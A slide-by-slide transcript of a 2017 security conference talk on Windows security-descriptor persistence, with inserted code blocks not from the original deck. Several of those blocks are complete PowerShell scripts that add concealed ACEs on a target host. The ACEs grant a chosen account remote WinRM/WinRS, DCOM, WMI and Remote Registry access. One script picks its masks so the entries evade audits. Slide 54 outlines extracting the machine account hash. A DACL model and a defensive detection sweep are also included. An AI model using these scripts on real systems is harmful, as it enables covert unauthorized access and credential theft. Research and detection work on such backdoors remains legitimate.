
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors

This talk was given at DerbyCon 2017.


  • 1. An ACE in the Hole Stealthy Host Persistence via Security Descriptors
  • 2. Who We Are
    × @tifkin_ / @enigma0x3 / @harmj0y
    × Red teamers/researchers at SpecterOps
    × Code on code on code
    × Cons on cons on cons
  • 3. What This Is
    × Offensive applications
    × Intro to securable objects
    × Our Research Process
    × Securable object takeover primitives
    × Case studies/demos
    × Defense
  • 5. “As an offensive researcher, if you can dream it, someone has likely already done it...and that someone isn’t the kind of person who speaks at security cons”
    Matt “f’ing” Graeber, BlackHat 2015
  • 8. Why Care (really)?
    × It’s often difficult to determine whether a specific security descriptor misconfiguration was set maliciously or configured by accident
    × These changes also have a minimal, different forensic footprint and grant:
      × Bug longevity! Privesc! Persistence!
    × They might already be on your system ;)
    × Living off the land++ (existed since NT was born!)
  • 9. Big Point(s)
    × Most defenders are not aware of this general persistence approach, much less how to find and remediate it!
    × You don’t need to leave malicious code/logic on a system to regain access!
    × What if this change was made to an organization’s “gold image”?
  • 10. Responsibly Evil ;)
    × Also, you don’t need to set the principal/trustee (who has the rights) to S-1-1-0!
    × Security descriptor backdoors can be set for specific trustees in a targeted manner so exposure in the environment is minimized
  • 11. ¯\_(ツ)_/¯
    × “If an attacker has code execution on your system, you’re screwed already, so who cares”
    × “You need admin rights to do this, this is stupid!”
    × To this we say: domain-joined boxes != isolated home systems
    × We guess the defensive industry should just pack up and leave…
  • 13. What is a “Securable Object”? A Windows object that can have a security descriptor
  • 16. Where are these descriptors?
    × Found in the registry, the file system, in the kernel, ntds.dit....
    × Really depends on the type of object
    × Finding what objects are securable, much less exactly where their descriptors are located, isn’t as easy as you’d think...
  • 17. From DACLs to SACLs
    × Access Control List (ACL) is basically shorthand for the DACL/SACL superset
    × An object’s Discretionary Access Control List (DACL) and System Access Control List (SACL) are ordered collections of Access Control Entries (ACEs)
    × DACL - What principals/trustees have what rights over the object
    × The SACL - Specifies how to audit access to the object
  • 19. More on DACLs
    × Null DACL != no DACL
    × Inheritance… can be a >_<
    × General interpretation (ACE order):
      × Explicit Deny
      × Explicit Allow
      × Inherited Deny
      × Inherited Allow
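As an added illustration of the slide's bullets (not from the talk or the speakers' tooling), a small Python model of how a DACL is walked: a NULL DACL grants everything, a DACL with no ACEs grants nothing, and an allow ACE placed ahead of a deny for the same trustee silently overrides it, which is why the canonical order matters. The SIDs and the READ/WRITE bits are constructed for the demo.

```python
from dataclasses import dataclass
from typing import List, Optional, Set

# Constructed access-mask bits for the model: READ/WRITE are illustrative
# object-specific bits, WRITE_DAC/WRITE_OWNER are the real standard-right values.
READ, WRITE = 0x1, 0x2
WRITE_DAC, WRITE_OWNER = 0x40000, 0x80000

# Constructed SIDs for the demo (not real principals).
EVERYONE = "S-1-1-0"
ALICE = "S-1-5-21-1111-2222-3333-1104"

@dataclass
class Ace:
    kind: str           # "allow" or "deny"
    sid: str            # trustee the ACE applies to
    mask: int           # access-mask bits granted or denied
    inherited: bool = False

def canonical_rank(ace: Ace) -> int:
    """Canonical DACL order: explicit deny, explicit allow, inherited deny, inherited allow."""
    return (2 if ace.inherited else 0) + (1 if ace.kind == "allow" else 0)

def is_canonical(dacl: List[Ace]) -> bool:
    """True when the ACEs appear in the order the slide lists."""
    ranks = [canonical_rank(a) for a in dacl]
    return ranks == sorted(ranks)

def access_check(dacl: Optional[List[Ace]], token_sids: Set[str], desired: int) -> bool:
    """Model of the kernel's DACL walk.

    None (a NULL DACL) means no protection at all: everything is granted.
    An empty list (a DACL with no ACEs) grants nothing.
    Otherwise ACEs are read top to bottom: a deny ACE for one of the token's
    SIDs that covers any still-outstanding bit denies access; allow ACEs
    accumulate until every desired bit has been granted.
    """
    if dacl is None:
        return True
    remaining = desired
    for ace in dacl:
        if ace.sid not in token_sids:
            continue
        if ace.kind == "deny" and ace.mask & remaining:
            return False
        if ace.kind == "allow":
            remaining &= ~ace.mask
            if remaining == 0:
                return True
    return remaining == 0

def sample_dacl() -> List[Ace]:
    """Constructed DACL: an explicit deny for ALICE on WRITE, then an inherited
    allow for Everyone on READ|WRITE (the kind of ACE a parent hands down)."""
    return [
        Ace("deny", ALICE, WRITE),
        Ace("allow", EVERYONE, READ | WRITE, inherited=True),
    ]

def demo() -> dict:
    """Run the checks the slide's bullets imply and return the outcomes."""
    alice = {ALICE, EVERYONE}
    canonical = sample_dacl()
    reordered = list(reversed(canonical))   # allow now sits in front of the deny
    return {
        "null_dacl_grants_write_dac": access_check(None, alice, WRITE_DAC),
        "empty_dacl_grants_read": access_check([], alice, READ),
        "canonical_is_canonical": is_canonical(canonical),
        "canonical_alice_write": access_check(canonical, alice, WRITE),
        "canonical_alice_read": access_check(canonical, alice, READ),
        "reordered_is_canonical": is_canonical(reordered),
        "reordered_alice_write": access_check(reordered, alice, WRITE),
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```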
  • 21. Our Research Approach
    Objects accessible from user-mode, with a focus on ones usable for persistence/lateral movement
    1. Discover securable objects
    2. Offline and online security descriptor enumeration
    3. Analyze access masks
       a. What object-specific rights are there (if any)?
       b. What rights permit persistence/lateral movement?
    4. Operational weaponization and detection
  • 22. 1. Discovering Securable Objects
    × Windows documentation lists about 20-30 securable objects*
    × We’ve identified 70+! (There’s *many* more)
    × Microsoft Protocol Specifications
      × Very useful for RPC servers
    × Find-RegistrySecurityDescriptors.ps1
    * https://msdn.microsoft.com/en-us/library/windows/desktop/aa379557(v=vs.85).aspx
  • 24. 2. Online vs Offline Security Descriptors
    × Where do objects get their security descriptor?
      × Offline - Security descriptor derived from registry, file, ntds.dit, etc.
      × Online - Security descriptor is in memory
    Our approach to enumeration:
    × Locally as an unprivileged user
    × Locally as a privileged user
    × Remotely as an unprivileged user
    × Remotely as a privileged user
  • 25. Existing Tooling
    × Use existing tools
      × Accesschk.exe
      × WindowsDACLEnumProject
      × Google’s sandbox analysis tools
      × NtObjectManager woot woot!
      × BloodHound
    × Most do not distinguish between online/offline security descriptors
      × Implication: How do you know if an object has been modified after creation?
  • 26. Enumeration Caveats
    × “Online” vs offline security descriptors
    × Necessary token privileges
    × Some objects are “invisible” to user-mode enumeration
      × Kernel private namespaces
    × Does an object with no name have a security descriptor?
      × https://googleprojectzero.blogspot.co.uk/2014/10/did-man-with-no-name-feel-insecure.html
  • 27. 3. Access Mask Analysis - Taking back what’s yours ;)
  • 28. Deriving Access Mask Meaning
    × MSDN Documentation
    × Technical Specifications
    × Reversing
    × Trial and error ¯\_(ツ)_/¯
  • 29. Generic Object Takeover Primitives
    × Attacker is owner (implies WRITE_DAC)
    × Attacker has WRITE_DAC/WRITE_OWNER
    × Attacker has STANDARD_RIGHTS_ALL
    × Attacker has GENERIC_ALL*
    × Object has NULL security descriptor (implies Everyone has GENERIC_ALL)
    * Depends on how the object maps the generic right to standard/object-specific rights. Usually this includes WRITE_DAC/WRITE_OWNER, but doesn’t have to
  • 30. Object-specific Takeover Primitives
    × Each securable object can define its own rights
    × Example: Process Rights
      × PROCESS_CREATE_PROCESS
      × PROCESS_CREATE_THREAD
      × PROCESS_SUSPEND_RESUME
      × PROCESS_QUERY_INFORMATION
      × PROCESS_TERMINATE
    × The specific object and its rights determine its offensive usefulness (priv esc, lateral movement, persistence, etc.)
  • 32. Service Control Manager RPC Server
    × “RPC server that enables service configuration and control of service programs.” - MS-SCMR
    × Applicable Securable Objects
      × Service Control Manager Server
      × Windows Services
  • 33. SCM Server Applicable Rights
    SC_MANAGER_CONNECT             Permits connecting to the service control manager
    SC_MANAGER_CREATE_SERVICE      Ability to add a new service
    SC_MANAGER_ENUMERATE_SERVICE   List out services
    By default, unauthenticated users can enumerate the security descriptor of the SCM Server!
• 35. WinRM/WinRS
  × Windows Remote Management / Windows Remote Shell
  × Provides the ability to remotely interface with a host
    × Think PowerShell Remoting
  × Create a backdoored ACE and apply it to either the WinRM or the WinRS DACL
    × Or both!!
  × The defined user (via SID) will be able to remotely interact with the host without admin privs
• 36. WinRM/WinRS
  × The security descriptor can be read from the SecurityDescriptorSddl property of Get-PSSessionConfiguration
  × Build the new DACL via DiscretionaryAcl.AddAccess() of System.Security.AccessControl.CommonSecurityDescriptor
  × PowerShell Remoting:
    × Set the new DACL via -SecurityDescriptorSddl of Set-PSSessionConfiguration
  × WinRS:
    × Set WSMan:\localhost\Service\RootSDDL to the new DACL via Set-Item
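The procedure on slide 36, carried through end to end as an added example (this is not code from the deck or from SpecterOps). It parses the existing SDDL, appends one Allow ACE and writes the result back to both the PowerShell Remoting endpoint and the WinRS RootSDDL. $TargetSid and the endpoint name are assumptions; run it in an elevated shell on the host being backdoored.

```powershell
# Added example, not from the original deck: grant one non-admin SID remote access via both
# the PowerShell Remoting endpoint and the WinRS root SDDL.
# $TargetSid and $ConfigurationName are assumptions; adjust for the target.
param(
    [Parameter(Mandatory)] [string]$TargetSid,                 # e.g. 'S-1-5-21-...-1105'
    [string]$ConfigurationName = 'Microsoft.PowerShell'
)

# Parse an SDDL string, append an Allow ACE for $Sid with $Mask, and return the new SDDL.
function Add-AllowAceToSddl {
    param([string]$Sddl, [string]$Sid, [int]$Mask)
    # isContainer=$false, isDS=$false: a plain (non-directory-service) object
    $sd = New-Object System.Security.AccessControl.CommonSecurityDescriptor -ArgumentList $false, $false, $Sddl
    $sd.DiscretionaryAcl.AddAccess(
        [System.Security.AccessControl.AccessControlType]::Allow,
        [System.Security.Principal.SecurityIdentifier]$Sid,
        $Mask,
        [System.Security.AccessControl.InheritanceFlags]::None,
        [System.Security.AccessControl.PropagationFlags]::None)
    return $sd.GetSddlForm([System.Security.AccessControl.AccessControlSections]::All)
}

# GENERIC_ALL ('GA' in SDDL) is the mask the default endpoint SDDL grants to Administrators
# and Remote Management Users, so the added SID gets exactly what a legitimate remoting user has.
$GENERIC_ALL = 0x10000000

# 1. PowerShell Remoting: the session configuration's SecurityDescriptorSddl
$current = (Get-PSSessionConfiguration -Name $ConfigurationName).SecurityDescriptorSddl
$new = Add-AllowAceToSddl -Sddl $current -Sid $TargetSid -Mask $GENERIC_ALL
Set-PSSessionConfiguration -Name $ConfigurationName -SecurityDescriptorSddl $new -Force

# 2. WinRS: the RootSDDL of the WinRM service
$rootPath = 'WSMan:\localhost\Service\RootSDDL'
$current = (Get-Item -Path $rootPath).Value
$new = Add-AllowAceToSddl -Sddl $current -Sid $TargetSid -Mask $GENERIC_ALL
Set-Item -Path $rootPath -Value $new -Force

# Show what is now in place
Get-PSSessionConfiguration -Name $ConfigurationName | Select-Object Name, Permission
(Get-Item -Path $rootPath).Value
```

Set-PSSessionConfiguration restarts the WinRM service, so expect any live remoting sessions to the host to drop while it runs. The same SDDL-in, SDDL-out function works for any object whose security descriptor a tool exposes as a string.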
• 37. WinRM/WinRS
  × Already weaponized here: https://github.com/ssOleg/Useful_code/blob/master/Set-RemoteShellAccess.ps1
    × In 2014…
  × Takes a domain SID and adds an ACE for that SID to both the PowerShell Remoting and WinRS DACLs
  × Allows that specific user/group to remotely interface with WinRM/WinRS without having any additional privilege
• 38. DCOM
  × Distributed Component Object Model
  × Been around since 1996… >_<
  × Secured via Launch and Activation permissions
    × Local/Remote; perms reside in the registry
  × Can you use interesting DCOM applications to get code execution?
    × Applications with "ExecuteShellCommand()"
  × Backdoor your favorite DCOM application for a specific user/group's SID :-)
• 39. DCOM
  × Access is determined via machine-wide permissions first and then application-specific permissions
  × Add the target user/group to the machine-wide Remote Activation/Launch permissions
    × Instead of editing the Default, just edit the Limit
    × HKLM:\Software\Microsoft\Ole\MachineLaunchRestriction
    × (A;;CCRPLC;;;$SID)  (CC = COM_RIGHTS_EXECUTE, LC = COM_RIGHTS_EXECUTE_REMOTE, RP = COM_RIGHTS_ACTIVATE_REMOTE: remote launch and remote activation only)
  × Backdoor a specific DCOM application for a domain user/group
    × HKLM:\Software\Classes\AppID\{GUID}\LaunchPermission
    × HKLM:\Software\Classes\AppID\{GUID}\AccessPermission
  × Requires SeTakeOwnershipPrivilege, SeRestorePrivilege, SeSecurityPrivilege if installing locally
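The DCOM permissions on slide 39 are stored as REG_BINARY self-relative security descriptors rather than SDDL, so the edit is a parse, insert, re-serialize cycle. The following added example (not from the deck) does that for the machine-wide MachineLaunchRestriction limit and, optionally, for one AppID's LaunchPermission; $TargetSid and $AppId are assumptions, and the script expects to run elevated with the privileges the slide lists if the key resists writes.

```powershell
# Added example, not from the original deck: append a remote-launch + remote-activation ACE to
# DCOM security descriptors stored as REG_BINARY values. $TargetSid and $AppId are assumptions.
param(
    [Parameter(Mandatory)] [string]$TargetSid,   # e.g. 'S-1-5-21-...-1105'
    [string]$AppId                               # optional AppID GUID '{...}' of the DCOM server to backdoor
)

# COM launch/activation rights and the SDDL letters they map to:
#   COM_RIGHTS_EXECUTE         0x01  'CC'
#   COM_RIGHTS_EXECUTE_REMOTE  0x04  'LC'  (remote launch)
#   COM_RIGHTS_ACTIVATE_REMOTE 0x10  'RP'  (remote activation)
$REMOTE_LAUNCH_AND_ACTIVATE = 0x01 -bor 0x04 -bor 0x10    # == (A;;CCRPLC;;;$SID)

function Add-ComAllowAce {
    param([string]$KeyPath, [string]$ValueName, [string]$Sid, [int]$Mask)
    # The value is a self-relative binary security descriptor
    $bytes = (Get-ItemProperty -Path $KeyPath -Name $ValueName -ErrorAction SilentlyContinue).$ValueName
    if (-not $bytes) { throw "$KeyPath\$ValueName is absent; with no Limit/LaunchPermission value the defaults apply" }
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor -ArgumentList $bytes, 0
    Write-Verbose "Before: $($sd.GetSddlForm('All'))"

    $ace = New-Object System.Security.AccessControl.CommonAce -ArgumentList @(
        [System.Security.AccessControl.AceFlags]::None,            # no inheritance
        [System.Security.AccessControl.AceQualifier]::AccessAllowed,
        $Mask,
        [System.Security.Principal.SecurityIdentifier]$Sid,
        $false,                                                    # not a callback ACE
        $null                                                      # no opaque data
    )
    # Append at the end: an extra Allow ACE cannot weaken any existing Deny ACE that precedes it
    $sd.DiscretionaryAcl.InsertAce($sd.DiscretionaryAcl.Count, $ace)

    $out = New-Object byte[] $sd.BinaryLength
    $sd.GetBinaryForm($out, 0)
    Set-ItemProperty -Path $KeyPath -Name $ValueName -Value $out -Type Binary
    Write-Verbose "After:  $($sd.GetSddlForm('All'))"
    return $sd.GetSddlForm('All')
}

# Machine-wide: edit the Limit, not the Default
Add-ComAllowAce -KeyPath 'HKLM:\Software\Microsoft\Ole' -ValueName 'MachineLaunchRestriction' `
                -Sid $TargetSid -Mask $REMOTE_LAUNCH_AND_ACTIVATE

# Per application: the chosen DCOM server's own LaunchPermission
if ($AppId) {
    Add-ComAllowAce -KeyPath "HKLM:\Software\Classes\AppID\$AppId" -ValueName 'LaunchPermission' `
                    -Sid $TargetSid -Mask $REMOTE_LAUNCH_AND_ACTIVATE
}
```

Run with -Verbose to see the SDDL before and after each write. MachineAccessRestriction and an AppID's AccessPermission are the same format, so the same function covers the "Access" half of the permissions if the target interface needs it.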
• 42. WMI Namespaces
  × Contain a collection of WMI classes that host various methods/properties
  × Each namespace has an associated DACL
  × Windows checks the DCOM machine-wide launch permissions for the first stage of access
    × If successful, the DACL on the WMI namespace is then checked
  × Backdoor a namespace that contains a class with a useful method
    × Create() method of Win32_Process, for example
• 43. WMI Namespaces
  × Call GetSecurityDescriptor() on the target WMI namespace (local requires SeSecurityPrivilege)
  × Use Win32_Ace to set our access mask and flags
  × Use Win32_Trustee to assign the user
  × Set the "Trustee" property of Win32_Ace to our Win32_Trustee object
  × Add our new ACE to the target namespace DACL: $NameSpaceACL.DACL += $Ace.PSObject.ImmediateBaseObject
  × Call SetSecurityDescriptor() with the newly updated namespace object to set it
• 46. Printers
  × Securable objects
    a. Print servers: HKLM\SYSTEM\CurrentControlSet\Control\Print\ServerSecurityDescriptor
    b. Printer objects: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\<printer name>\Security
    c. Print jobs: not very interesting offensively
  × Specifications: MS-RPRN, MS-PAR, MS-PAN, MS-PRSOD
• 51. Remote Registry
  × Allows permitted users/groups to access the registry remotely via the .NET/Win32 API
    × [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey()
  × The RemoteRegistry service has to be enabled and the calling user has to have access
    × By default in Windows 7/10, this service is disabled
  × Remote access to the registry == ability to dump hashes (among other things) 😈
• 52. Remote Registry
  × Imagine this scenario: remotely dumping an endpoint's machine account hash as an unprivileged user
  × Remotely backdoor the winreg key for a specified user/group
    × Located at HKLM:\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg
    × The DACL on this key decides who is allowed to connect via remote registry
• 53. Remote Registry
  × Can be accomplished via WMI's StdRegProv provider
    × Call SetSecurityDescriptor() with an ACE that defines the user/permissions for the backdoor
  × Why not just use StdRegProv for the dump itself?
    × Dumping the machine account hash requires obtaining various registry key classes
    × Those can only be obtained via RegQueryInfoKey()
  × Use Set-Service to remotely set the service StartupType to "Manual"
    × Set-Service -Name "RemoteRegistry" -ComputerName $Computer -StartupType "Manual"
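Slides 43 and 53 both build the ACE with the WMI Win32_Ace / Win32_Trustee classes and differ only in which provider's SetSecurityDescriptor() receives it, so one added example (not from the deck) serves both: it grants $TargetSid remote method execution on root\cimv2 and KEY_READ on the winreg key of $Computer, then sets RemoteRegistry to Manual as the slide does. $Computer and $TargetSid are assumptions; the caller must be a local administrator of $Computer.

```powershell
# Added example, not from the original deck: one Win32_Ace/Win32_Trustee builder applied to
# (1) the root\cimv2 namespace DACL via __SystemSecurity and (2) the winreg key DACL via StdRegProv.
# $Computer and $TargetSid are assumptions.
param(
    [Parameter(Mandatory)] [string]$Computer,
    [Parameter(Mandatory)] [string]$TargetSid      # e.g. 'S-1-5-21-...-1105'
)

function New-WmiAllowAce {
    param([string]$Computer, [string]$Sid, [int]$Mask)
    $trustee = ([wmiclass]"\\$Computer\root\cimv2:Win32_Trustee").CreateInstance()
    $trustee.SIDString = $Sid
    $ace = ([wmiclass]"\\$Computer\root\cimv2:Win32_Ace").CreateInstance()
    $ace.AccessMask = $Mask
    $ace.AceFlags   = 0          # no inheritance flags
    $ace.AceType    = 0          # ACCESS_ALLOWED_ACE_TYPE
    $ace.Trustee    = $trustee
    return $ace
}

# --- 1. WMI namespace (slide 43) ---
# WBEM_ENABLE (0x1) | WBEM_METHOD_EXECUTE (0x2) | WBEM_REMOTE_ACCESS (0x20): enough to call a
# class method such as Win32_Process.Create() from another host, and nothing more.
$WMI_REMOTE_EXEC = 0x1 -bor 0x2 -bor 0x20
$nsSecurity = Get-WmiObject -ComputerName $Computer -Namespace 'root\cimv2' -Class __SystemSecurity
$got = $nsSecurity.GetSecurityDescriptor()
if ($got.ReturnValue -ne 0) { throw "GetSecurityDescriptor on root\cimv2 failed: $($got.ReturnValue)" }
$nsSd = $got.Descriptor
$nsSd.DACL += (New-WmiAllowAce -Computer $Computer -Sid $TargetSid -Mask $WMI_REMOTE_EXEC).PSObject.ImmediateBaseObject
$set = $nsSecurity.SetSecurityDescriptor($nsSd.PSObject.ImmediateBaseObject)
if ($set.ReturnValue -ne 0) { throw "SetSecurityDescriptor on root\cimv2 failed: $($set.ReturnValue)" }

# --- 2. winreg key (slide 53) ---
# KEY_READ (0x20019) on SecurePipeServers\winreg is what lets a caller connect via Remote Registry;
# the DACLs of the individual keys still decide what that caller can read afterwards.
$KEY_READ = 0x20019
$HKLM     = [uint32]2147483650
$winreg   = 'SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg'
$reg = [wmiclass]"\\$Computer\root\default:StdRegProv"
$got = $reg.GetSecurityDescriptor($HKLM, $winreg)
if ($got.ReturnValue -ne 0) { throw "GetSecurityDescriptor on winreg failed: $($got.ReturnValue)" }
$regSd = $got.Descriptor
$regSd.DACL += (New-WmiAllowAce -Computer $Computer -Sid $TargetSid -Mask $KEY_READ).PSObject.ImmediateBaseObject
$set = $reg.SetSecurityDescriptor($HKLM, $winreg, $regSd.PSObject.ImmediateBaseObject)
if ($set.ReturnValue -ne 0) { throw "SetSecurityDescriptor on winreg failed: $($set.ReturnValue)" }

# RemoteRegistry is disabled by default on client SKUs; the slide switches it to Manual
Set-Service -Name 'RemoteRegistry' -ComputerName $Computer -StartupType Manual
```

The masks are deliberately minimal: the namespace ACE does not carry WRITE_DAC or WBEM_FULL_WRITE_REP, and the winreg ACE does not carry KEY_WRITE, so a later audit of the DACLs sees a read-only-looking trustee rather than an obvious full-control entry.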
• 54. Remote Registry
  × Remotely take ownership of the SECURITY registry hive and add an ACE to the DACL for the backdoor user
  × As that user, remotely call RegConnectRegistry()
  × Open the required keys and pull each key's class
    × SYSTEM\CurrentControlSet\Control\Lsa\{JD, Skew1, GBG, Data}
    × RegOpenKeyEx(), RegQueryInfoKey()
  × Combine these class values and compute the BootKey
  × Use the BootKey to decrypt the LSA key
  × Use the LSA key to decrypt the machine account hash
• 58. SACLs: the other ACL
  × A system access control list
  × "Enables administrators to log attempts to access a secured object"
  × Not used as extensively as they should be!
• 59. Defensive Enumeration
  × More research is needed: you can't defend against what you aren't aware of!
  × Defensive PowerUp++? An operational test framework for the detection of backdoor scenarios?
  × Integration into BloodHound?
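As a starting point for the defensive enumeration slide 59 asks for, and the SACL use slide 58 recommends, this added example (not from the deck) sweeps the host-level DACLs covered in the talk and reports every trustee that is a specific account or group (S-1-5-21-*) or one of a few broad well-known SIDs that never appear in those DACLs by default; the default DACLs on these objects only name BUILTIN and well-known service SIDs, so anything else was put there by someone. The "never default" SID list is an assumption to tune per environment. Run it elevated on the host being inspected.

```powershell
# Added example, not from the original deck: flag non-default trustees on the DACLs discussed in
# this deck, and optionally put an audit ACE on the winreg key.
# The $NeverDefault list is an assumption; extend it to fit the environment.
$NeverDefault = @('S-1-1-0', 'S-1-5-11', 'S-1-5-7')   # Everyone, Authenticated Users, Anonymous

function Resolve-SidName {
    param([string]$Sid)
    try { (New-Object System.Security.Principal.SecurityIdentifier $Sid).Translate([System.Security.Principal.NTAccount]).Value }
    catch { '<unresolved>' }
}

# Parse an SDDL DACL and return its ACEs as flat records
function Get-DaclEntries {
    param([string]$Sddl)
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor -ArgumentList $Sddl
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace -is [System.Security.AccessControl.CommonAce]) {
            [pscustomobject]@{
                Sid  = $ace.SecurityIdentifier.Value
                Type = $ace.AceType
                Mask = ('0x{0:x}' -f $ace.AccessMask)
            }
        }
    }
}

# Keep only trustees that a default install would not have on this object
function Find-UnexpectedTrustees {
    param([string]$Label, [string]$Sddl, [string[]]$AlsoFlag = @())
    Get-DaclEntries -Sddl $Sddl |
        Where-Object { $_.Sid -like 'S-1-5-21-*' -or $AlsoFlag -contains $_.Sid } |
        ForEach-Object {
            [pscustomobject]@{ Object = $Label; Sid = $_.Sid; Name = (Resolve-SidName $_.Sid); AceType = $_.Type; Mask = $_.Mask }
        }
}

$findings = @()

# 1. PowerShell Remoting endpoints (defaults: Administrators, Remote Management Users, INTERACTIVE)
foreach ($cfg in Get-PSSessionConfiguration) {
    $findings += Find-UnexpectedTrustees -Label "WinRM:$($cfg.Name)" -Sddl $cfg.SecurityDescriptorSddl -AlsoFlag $NeverDefault
}

# 2. WinRS root SDDL
$findings += Find-UnexpectedTrustees -Label 'WinRS:RootSDDL' -Sddl (Get-Item WSMan:\localhost\Service\RootSDDL).Value -AlsoFlag $NeverDefault

# 3. Remote Registry gate (defaults: Administrators, Backup Operators, LOCAL SERVICE)
$winreg = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg'
$findings += Find-UnexpectedTrustees -Label 'RemoteRegistry:winreg' -Sddl (Get-Acl -Path $winreg).Sddl -AlsoFlag $NeverDefault

# 4. DCOM machine-wide limits, stored as REG_BINARY self-relative descriptors
#    (Everyone and Anonymous are present by default here, so only S-1-5-21-* SIDs are flagged)
foreach ($v in 'MachineLaunchRestriction', 'MachineAccessRestriction') {
    $bytes = (Get-ItemProperty -Path 'HKLM:\Software\Microsoft\Ole' -Name $v -ErrorAction SilentlyContinue).$v
    if ($bytes) {
        $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor -ArgumentList $bytes, 0
        $findings += Find-UnexpectedTrustees -Label "DCOM:$v" -Sddl $sd.GetSddlForm('All')
    }
}

$findings | Format-Table -AutoSize

# SACL (slide 58): audit successful reads of the winreg key. With "Audit Object Access" (Registry)
# enabled in the audit policy, access checks against the key are written to the Security log as 4656/4663.
function Add-WinregReadAudit {
    $acl  = Get-Acl -Path $winreg -Audit
    $rule = New-Object System.Security.AccessControl.RegistryAuditRule -ArgumentList 'Everyone', 'ReadKey', 'None', 'None', 'Success'
    $acl.AddAuditRule($rule)
    Set-Acl -Path $winreg -AclObject $acl
}
```

The sweep deliberately checks the few objects this deck walks through; the point of slide 60 is that the real list is much longer (WMI namespaces, per-AppID DCOM permissions, services, printers), and each of those is another line in the loop above once its security descriptor can be read.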
• 60. Takeaways
  × The host-control graph is *MUCH* bigger than "is member of local admin group"
  × What is the real attack surface of a Windows host?
    × Many "forgotten" or unexplored RPC/DCOM servers
    × Many other securable objects we haven't looked at
• 62. Takeaways & Future Work
  × Implications of other securable objects
  × Real-time analysis
  × Enumeration of objects visible only to the kernel
  × Chaining host + AD security descriptor abuse
• 63. Thanks! Any questions?
  @tifkin_ / @enigma0x3 / @harmj0y
  https://specterops.io/